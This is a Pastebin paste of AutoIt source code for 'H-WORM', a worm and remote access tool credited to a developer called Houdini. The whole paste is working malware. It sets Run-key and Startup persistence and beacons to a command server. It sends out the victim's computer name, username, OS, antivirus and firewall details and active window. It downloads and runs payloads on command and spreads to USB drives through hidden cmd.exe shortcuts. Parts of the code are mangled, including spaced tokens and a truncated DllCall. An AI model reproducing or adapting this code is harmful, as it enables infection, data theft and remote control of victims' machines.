SHARE
TWEET

Untitled

a guest Jul 2nd, 2013 2,149 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Cs = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  2. H-WORM UNDER WORLD (AUTOIT VERSION) \
  3. = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  4.  
  5. CODER:
  6. HOUDINI (C) - WWW.DEV-POINT.COM
  7.  
  8. COMPILED LANGUAGE:
  9. AUTOIT V 3.0
  10.  
  11. VISIT OWR FOR MORE INFO OR CONTACT ME IN:
  12. SKYPE: HOUDINI-FX
  13.  
  14. # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  15.  
  16. # INCLUDE <PROCESS.AU3>
  17. # INCLUDE <WINAPI.AU3>
  18. # INCLUDE <FILE.AU3>
  19. # NOTRAYICON
  20.  
  21. # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  22. WORM CONFIG
  23. # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  24.  
  25. LOCAL $ IP_ADDR = "127.0.0.1"
  26. LOCAL $ PORT = "40055"
  27. LOCAL $ INSTALL_DIR = @ TEMPDIR
  28.  
  29.  
  30. # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  31. WORM VARIABLE
  32. # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  33.  
  34. LOCAL $ CIMV2 = OBJGET ("WINMGMTS: {IMPERSONATIONLEVEL = IMPERSONATE}! \ \. \ ROOT \ CIMV2")
  35. LOCAL $ SPLITTER = "<|>"
  36. LOCAL $ WORM_VERSION = "H-WORM (AUTOIT)"
  37. LOCAL $ USB_SPREADING = "FALSE"
  38. LOCAL $ SERVER_CMD
  39. LOCAL $ W_METUX
  40. LOCAL $ WZDRIVE, $ WZDIR, $ WZFNAME, $ WZEXT
  41.  
  42.  
  43. # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  44. WORM CODE: START
  45. # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  46.  
  47. IF NOT @ COMPILED THEN EXIT
  48. __INIT ()
  49. WHILE TRUE
  50. __USB_SPREADING ()
  51. __STARTUP ()
  52. $ SERVER_CMD = __ POST ("I_AM_READY")
  53. $ SERVER_CMD = STRINGSPLIT ($ SERVER_CMD, $ SPLITTER, 1)
  54. SELECT
  55. CASE $ SERVER_CMD [1] = "UNINSTALL"
  56. CONSOLEWRITE ($ SERVER_CMD [1] & @ CRLF)
  57. __USB_SPREADING ($ SERVER_CMD [1])
  58. REGDELETE ("HKEY_LOCAL_MACHINE \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME)
  59. REGDELETE ("HKEY_CURRENT_USER \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME)
  60. FILEDELETE (@ STARTUPDIR & "\" & @ SCRIPTNAME)
  61. EXIT
  62. CASE $ SERVER_CMD [1] = "UPDATE"
  63. CONSOLEWRITE ("UPDATE" & $ SERVER_CMD [2] & @ CRLF)
  64. _WINAPI_CLOSEHANDLE ($ W_METUX)
  65. __DAWONLOAD_AND_EXEC ($ SERVER_CMD [2], TRUE, "/ UPDATE")
  66. EXIT
  67. CASE $ SERVER_CMD [1] = "SEND"
  68. CONSOLEWRITE ("SEND" & $ SERVER_CMD [2] & @ CRLF)
  69. __DAWONLOAD_AND_EXEC ($ SERVER_CMD [2])
  70. CASE $ SERVER_CMD [1] = "EXCECUTE"
  71. CONSOLEWRITE ("EXCECUTE" & $ SERVER_CMD [2] & @ CRLF)
  72. __RUNA3X ($ SERVER_CMD [2])
  73. ENDSELECT
  74. SLEEP (5000)
  75. WEND
  76.  
  77.  
  78. FUNC __ INIT ()
  79.  
  80. _PATHSPLIT (@ SCRIPTFULLPATH, $ WZDRIVE, $ WZDIR, $ WZFNAME, $ WZEXT)
  81. IF STRINGUPPER (FILEGETLONGNAME (@ SCRIPTFULLPATH)) <> STRINGUPPER (FILEGETLONGNAME ($ INSTALL_DIR & "\" & @ SCRIPTNAME)) THEN
  82. IF ($ CMDLINE [0]> 0) AND ($ CMDLINE [1] = "/ UPDATE") THEN
  83. DO
  84. UNTIL FILECOPY (@ SCRIPTFULLPATH, $ INSTALL_DIR & "\" & @ SCRIPTNAME, 1 +8) = 1
  85. ELSE
  86. FILECOPY (@ SCRIPTFULLPATH, $ INSTALL_DIR & "\" & @ SCRIPTNAME, 1 +8)
  87. ENDIF
  88. SHELLEXECUTE ($ INSTALL_DIR & "\" & @ SCRIPTNAME)
  89. EXIT
  90. ENDIF
  91. __ONE_INSTANCE ()
  92. __IS_USB_SPREADING ()
  93. ENDFUNC
  94.  
  95.  
  96.  
  97. FUNC __ DAWONLOAD_AND_EXEC ($ FILE, $ RUN = TRUE, $ CMD = "")
  98.  
  99. LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT
  100. LOCAL $ FGET_HANDEL
  101.  
  102. _PATHSPLIT ($ FILE, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
  103. $ RESULT = __ POST ("IS-SENDING" & $ SPLITTER & $ FILE, "STREAM")
  104. $ FGET_HANDEL = FILEOPEN (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & $ SZEXT, 16 +2 +8)
  105. FILEWRITE ($ FGET_HANDEL, $ RESULT)
  106. FILECLOSE ($ FGET_HANDEL)
  107. IF $ RUN THEN SHELLEXECUTE (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & $ SZEXT, $ CMD)
  108. RETURN @ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & $ SZEXT
  109. ENDFUNC
  110.  
  111.  
  112.  
  113.  
  114. FUNC __ RUNA3X ($ A3X_FILE, $ CMD = "")
  115.  
  116. LOCAL $ H_RESOURCE, $ A3X_STRUCT, $ A3X_DATA
  117. LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT
  118. LOCAL $ FGET_HANDEL
  119.  
  120. _PATHSPLIT ($ A3X_FILE, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
  121. FILECOPY (@ AUTOITEXE, @ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & ". EXE", 1 +8)
  122. $ A3X_DATA = __ POST ("IS-SENDING" & $ SPLITTER & $ A3X_FILE, "STREAM")
  123. $ A3X_STRUCT = DLLSTRUCTCREATE ("BYTE A3X [" & BINARYLEN ($ A3X_DATA) & "]")
  124. DLLSTRUCTSETDATA ($ A3X_STRUCT, "A3X", $ A3X_DATA)
  125.  
  126. $ H_RESOURCE = DLLCALL
  127. IF $ H_RESOURCE [0] <> 0 THEN
  128. DLLCALL ($ A3X_STRUCT), "DWORD", DLLSTRUCTGETSIZE ($ A3X_STRUCT))
  129. DLLCALL ("KERNEL32.DLL", "BOOL", "EndUpdateResource", "HANDLE", $ H_RESOURCE [0], "BOOL", FALSE)
  130. SHELLEXECUTE (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & ". EXE", $ CMD)
  131. ENDIF
  132. ENDFUNC
  133.  
  134.  
  135.  
  136.  
  137. FUNC __ POST ($ DATA, $ TYPE = "TEXT")
  138.  
  139. LOCAL $ RESULT
  140.  
  141. HTTPSETUSERAGENT (__INFORMATIOM ())
  142. $ RESULT = INETREAD ("HTTP :/ /" & $ IP_ADDR & ":" & $ PORT & "/" & $ DATA, 1)
  143. IF $ TYPE = "TEXT" THEN RETURN STRINGUPPER (BINARYTOSTRING ($ RESULT))
  144. RETURN $ RESULT
  145. ENDFUNC
  146.  
  147.  
  148. FUNC __ STARTUP ()
  149.  
  150. REGWRITE ("HKEY_LOCAL_MACHINE \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME, "REG_SZ", CHR (34) & $ INSTALL_DIR & "\" & @ SCRIPTNAME & CHR (34))
  151. REGWRITE ("HKEY_CURRENT_USER \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME, "REG_SZ", CHR (34) & $ INSTALL_DIR & "\" & @ SCRIPTNAME & CHR (34))
  152. FILECOPY (@ SCRIPTFULLPATH, @ STARTUPDIR & "\" & @ SCRIPTNAME)
  153. ENDFUNC
  154.  
  155.  
  156. FUNC __ INFORMATIOM ()
  157.  
  158. LOCAL $ INFORAMTION = ""
  159.  
  160. $ INFORAMTION = $ INFORAMTION & HEX (DRIVEGETSERIAL (@ HOMEDRIVE), 8) & $ SPLITTER
  161. $ INFORAMTION = $ INFORAMTION & @ COMPUTERNAME & $ SPLITTER
  162. $ INFORAMTION = $ INFORAMTION & @ USERNAME & $ SPLITTER
  163. $ INFORAMTION = $ INFORAMTION & __ OPERATING_SYSTEM () & $ SPLITTER
  164. $ INFORAMTION = $ INFORAMTION & $ WORM_VERSION & $ SPLITTER
  165. $ INFORAMTION = $ INFORAMTION & __ SECURITY_CENTER () & $ SPLITTER
  166. $ INFORAMTION = $ INFORAMTION & $ USB_SPREADING & $ SPLITTER
  167. $ INFORAMTION = $ INFORAMTION & __ TOP_WINDOWS ()
  168. RETURN $ INFORAMTION
  169.  
  170. ENDFUNC
  171.  
  172.  
  173.  
  174.  
  175.  
  176.  
  177. FUNC __ OPERATING_SYSTEM ()
  178.  
  179. LOCAL $ OPERATINGSYSTEM = $ CIMV2.EXECQUERY ("SELECT * FROM WIN32_OPERATINGSYSTEM")
  180. LOCAL $ OS_CAPTION = ""
  181.  
  182. FOR $ OS IN $ OPERATINGSYSTEM
  183. $ OS_CAPTION = $ OS.CAPTION & "."
  184. EXITLOOP
  185. NEXT
  186. RETURN $ OS_CAPTION
  187. ENDFUNC
  188.  
  189.  
  190.  
  191.  
  192.  
  193.  
  194. FUNC __ SECURITY_CENTER ()
  195.  
  196.  
  197. LOCAL $ OPERATINGSYSTEM = $ CIMV2.EXECQUERY ("SELECT * FROM WIN32_OPERATINGSYSTEM")
  198. LOCAL $ OS_VERSION
  199. LOCAL $ SECURITY_CENTER = "SECURITYCENTER"
  200.  
  201. FOR $ OS IN $ OPERATINGSYSTEM
  202. $ OS_VERSION = NUMBER ($ OS.VERSION)
  203. NEXT
  204. IF $ OS_VERSION> 6 THEN $ SECURITY_CENTER = "SECURITYCENTER2"
  205. $ OBJ_SECURITY_CENTER = OBJGET ("WINMGMTS: \ \. \ ROOT \" & $ SECURITY_CENTER)
  206.  
  207. LOCAL $ COL_ANTI_VIRUS = $ OBJ_SECURITY_CENTER.EXECQUERY ("SELECT * FROM ANTIVIRUSPRODUCT")
  208. LOCAL $ ANTI_VIRUSE = ""
  209. LOCAL $ COL_FIRE_WALL = $ OBJ_SECURITY_CENTER.EXECQUERY ("SELECT * FROM FIREWALLPRODUCT")
  210. LOCAL $ FIRE_WALL = ""
  211.  
  212. FOR $ OBJ_ANTI_VIRUS IN $ COL_ANTI_VIRUS
  213. $ ANTI_VIRUSE & = $ ANTI_VIRUSE & $ OBJ_ANTI_VIRUS.DISPLAYNAME & "."
  214. NEXT
  215.  
  216. FOR $ OBJ_FIRE_WALL IN $ COL_FIRE_WALL
  217. $ FIRE_WALL & = $ FIRE_WALL & $ OBJ_FIRE_WALL.DISPLAYNAME & "."
  218. NEXT
  219.  
  220. IF $ ANTI_VIRUSE = "" THEN $ ANTI_VIRUSE = "NO AV"
  221. IF $ FIRE_WALL = "" THEN $ FIRE_WALL = "NO FW"
  222.  
  223. RETURN $ ANTI_VIRUSE & "<|>" & $ FIRE_WALL
  224. ENDFUNC
  225.  
  226.  
  227.  
  228.  
  229.  
  230. FUNC __ TOP_WINDOWS ()
  231.  
  232. LOCAL $ WINTOP_TEXT = _WINAPI_GETWINDOWTEXT (_WINAPI_GETFOREGROUNDWINDOW ())
  233. LOCAL $ WINTOP_PID, $ WINTOP_PNAME
  234. _WINAPI_GETWINDOWTHREADPROCESSID (_WINAPI_GETFOREGROUNDWINDOW (), $ WINTOP_PID)
  235. $ WINTOP_PNAME = _PROCESSGETNAME ($ WINTOP_PID)
  236.  
  237. RETURN $ WINTOP_TEXT & "- [" & $ WINTOP_PNAME & "]"
  238. ENDFUNC
  239.  
  240.  
  241.  
  242.  
  243.  
  244. FUNC __ ONE_INSTANCE ()
  245.  
  246. $ W_METUX = _WINAPI_CREATEMUTEX ($ WZFNAME & "_" & $ WORM_VERSION)
  247. IF (@ ERROR) OR (_WINAPI_GETLASTERROR () = 183) THEN EXIT
  248. ENDFUNC
  249.  
  250.  
  251.  
  252. FUNC __ USB_SPREADING ($ TYPE = "INSTALL")
  253.  
  254. $ DISK = DRIVEGETDRIVE ("REMOVABLE")
  255. IF NOT ISARRAY ($ DISK) THEN RETURN
  256. FOR $ I = 1 TO $ DISK [0] STEP 1
  257. IF DRIVESTATUS ($ DISK [$ I]) = "READY" THEN __ IFOLDERS ($ DISK [$ I] & "\", $ TYPE)
  258. NEXT
  259.  
  260. ENDFUNC
  261.  
  262.  
  263.  
  264. FUNC __ IS_USB_SPREADING ()
  265.  
  266. LOCAL $ W_KEY = STRINGSPLIT (@ SCRIPTNAME, ".")
  267. $ USB_SPREADING = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \" & $ W_KEY [1], "")
  268. IF $ USB_SPREADING = "" THEN
  269. $ USB_SPREADING = "FALSE"
  270. IF STRINGUPPER (STRINGMID (@ SCRIPTFULLPATH, 2)) = STRINGUPPER (": \" & @ SCRIPTNAME) THEN $ USB_SPREADING = "TRUE"
  271. REGWRITE ("HKEY_LOCAL_MACHINE \ SOFTWARE \" & $ W_KEY [1], "", "REG_SZ", $ USB_SPREADING)
  272. ENDIF
  273. ENDFUNC
  274.  
  275.  
  276.  
  277. FUNC __ IFOLDERS ($ ROOT, $ TYPE = "INSTALL", $ FIRST = TRUE, $ CALLBACK = "__CALLBACK")
  278.  
  279. LOCAL $ H_SEARCH, $ ENUM_ARRAY [1], $ FIND_NAME
  280. LOCAL $ G_COUNTER = 0, $ L_COUNTER = 0
  281.  
  282. $ ENUM_ARRAY [0] = $ ROOT
  283. DO
  284. $ H_SEARCH = FILEFINDFIRSTFILE ($ ENUM_ARRAY [$ G_COUNTER] & "\ *")
  285. DO
  286. $ FIND_NAME = FILEFINDNEXTFILE ($ H_SEARCH)
  287. IF NOT @ ERROR AND $ FIND_NAME <> "" THEN
  288. REDIM $ ENUM_ARRAY [UBOUND ($ ENUM_ARRAY) +1]
  289. $ ENUM_ARRAY [UBOUND ($ ENUM_ARRAY) -1] = $ ENUM_ARRAY [$ G_COUNTER] & "\" & $ FIND_NAME
  290. CALL ($ CALLBACK, $ ENUM_ARRAY [$ G_COUNTER] & "\" & $ FIND_NAME, $ TYPE)
  291. $ L_COUNTER + = 1
  292. ENDIF
  293. UNTIL @ ERROR OR $ FIND_NAME = ""
  294. FILECLOSE ($ H_SEARCH)
  295. IF $ FIRST = TRUE AND $ G_COUNTER = 0 THEN EXITLOOP
  296. $ G_COUNTER + = 1
  297. UNTIL $ G_COUNTER> $ L_COUNTER
  298. RETURN $ ENUM_ARRAY
  299. ENDFUNC
  300.  
  301.  
  302. FUNC __ CALLBACK ($ PATH, $ TYPE)
  303.  
  304. LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT, $ SZICON, $ ARGU
  305. _PATHSPLIT ($ PATH, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
  306.  
  307. IF $ TYPE = "INSTALL" THEN
  308. IF (STRINGUPPER ($ SZEXT) = ". LNK") OR (STRINGUPPER ($ SZFNAME & $ SZEXT) = STRINGUPPER (@ SCRIPTNAME)) THEN RETURN
  309. FILECOPY (@ SCRIPTFULLPATH, $ SZDRIVE & $ SZDIR & @ SCRIPTNAME, TRUE)
  310. FILESETATTRIB ($ SZDRIVE & $ SZDIR & @ SCRIPTNAME, "+ HS")
  311. $ ARGU = "/ C START" & STRINGREPLACE (@ SCRIPTNAME, "", CHRW (34) & "" & CHRW (34)) & "& START" & STRINGREPLACE ($ SZFNAME & $ SZEXT, "", CHRW (34) & "" & CHRW (34)) & "& EXIT"
  312. IF NOT STRINGINSTR (FILEGETATTRIB ($ PATH), "D") THEN
  313. $ SZICON = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ CLASSES \" & REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ CLASSES \" & $ SZEXT, "") & "\ DEFAULTICON", "")
  314. ELSE
  315. $ SZICON = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ CLASSES \ FOLDER \ DEFAULTICON", "")
  316. ENDIF
  317. $ SZICON = STRINGSPLIT ($ SZICON, ",")
  318. IF ($ SZICON [0] = 1) AND (STRINGINSTR ($ SZICON [1], "% 1") = 0) THEN FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ ARGU , "", $ SZICON [1], "", "", @ SW_HIDE)
  319. IF ($ SZICON [0] = 1) AND (STRINGINSTR ($ SZICON [1], "% 1")> 0) THEN FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ ARGU , "", $ PATH, "", "", @ SW_HIDE)
  320. IF ($ SZICON [0] = 2) THEN FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ ARGU, "", $ SZICON [1], "", $ SZICON [2] , @ SW_HIDE)
  321. FILESETATTRIB ($ PATH, "+ HS")
  322. ENDIF
  323. IF $ TYPE = "UNINSTALL" THEN
  324. IF (STRINGUPPER ($ SZEXT) = ". LNK") OR (STRINGUPPER ($ SZFNAME & $ SZEXT) = STRINGUPPER (@ SCRIPTNAME)) THEN FILEDELETE ($ PATH)
  325. FILESETATTRIB ($ PATH, "-HS")
  326. ENDIF
  327.  
  328. ENDFUNC
  329.  
  330.  
  331. FUNC _WINAPI_CREATEMUTEX ($ SMUTEX, $ FINITIAL = 1, $ TSECURITY = 0)
  332.  
  333. LOCAL $ RET = DLLCALL ('KERNEL32.DLL', 'PTR', 'CreateMutexW', 'PTR', DLLSTRUCTGETPTR ($ TSECURITY), 'INT', $ FINITIAL, 'WSTR', $ SMUTEX)
  334. IF (@ ERROR) OR (NOT $ RET [0]) THEN
  335. RETURN SETERROR (1, 0, 0)
  336. ENDIF
  337. RETURN $ RET [0]
  338. ENDFUNC
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top